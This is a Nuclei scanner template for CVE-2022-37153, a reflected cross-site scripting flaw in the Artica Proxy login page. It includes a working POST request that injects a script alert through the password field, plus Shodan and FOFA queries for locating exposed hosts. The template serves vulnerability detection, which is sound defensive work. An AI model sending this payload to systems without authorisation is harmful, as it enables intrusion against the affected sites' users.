id: CVE-2022-37153

info:
  name: Artica Proxy 4.30.000000 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.
  impact: |
    Attackers can inject malicious JavaScript through the password parameter in the Artica Proxy login page that reflects back to users, potentially stealing credentials or session tokens when victims submit the login form.
  remediation: |
    Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.
  reference:
    - https://github.com/Fjowel/CVE-2022-37153
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37153
    - https://github.com/SYRTI/POC_to_review
    - https://github.com/WhooAmii/POC_to_review
    - https://github.com/k0mi-tg/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-37153
    cwe-id: CWE-79
    epss-score: 0.04408
    epss-percentile: 0.89198
    cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: articatech
    product: artica_proxy
    shodan-query:
      - http.html:"Artica"
      - http.html:"artica"
    fofa-query: body="artica"
  tags: cve,cve2022,xss,artica,articatech,vkev,vuln

http:
  - raw:
      - |
        POST /fw.login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Password" value="admin">'
          - 'Artica Web'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210099a8257f59fa7d3ef159a7b9124b5b6203b93a0562af5c153f782f9258903bd30221009de41aa635d95d3989eb3042f9aa50eda8ed86c70e8c6f31ae4f9d3606f6d74c:922c64590222798bb761d5b6d8e72950